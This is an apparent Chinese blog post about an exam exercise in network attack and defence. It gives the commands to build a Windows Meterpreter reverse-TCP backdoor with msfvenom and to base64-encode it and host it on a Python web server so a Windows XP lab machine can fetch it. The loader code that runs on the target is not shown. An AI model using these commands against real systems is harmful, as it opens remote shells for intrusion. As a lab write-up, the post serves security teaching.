zoukankan      html  css  js  c++  java
  • 网络攻防考试第四题博客

    先在Kali Linux中生成32位Windows的后门shellcode:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=1234 -f raw -o win_backdoor.raw

    接着开启Metasploit进行监听反弹的shell


    然后通过以下命令,将shellcode进行base64编码并利用SimpleHTTPServer模块将/tmp目录作为Web服务根目录并建立Web服务器:
    base64 -i win_backdoor.raw > shellcode.bin
    python -m SimpleHTTPServer

    最后,到XP端运行一下代码即可:

    以上顺序最好不要搞乱,就按上面的顺序一般不会出错,但是如果顺序乱了就可能出许多问题了,因为送试了好多次,之前搞python黑帽子的时候就迷迷糊糊搞出来就完事了,考试的时候就有搞不出来了总是报错,经过一个小时的实验,错了好多次发现按照这个顺序不会出错,特别提醒以上所有用得到的IP全是靶机的IP地址,切记切记。
    结果:


  • 相关阅读:
    HMM MEMM CRF 差别 联系
    JSTL简单介绍
    java基础&&高薪面试
    oracle-Normal
    oracle-Oradim
    oralce管理命令
    oracle默认日期格式
    oralce默认语言
    oracle国家字符集
    oracle-字符集
  • 原文地址:https://www.cnblogs.com/wxhwsr/p/10881839.html
Copyright © 2011-2022 走看看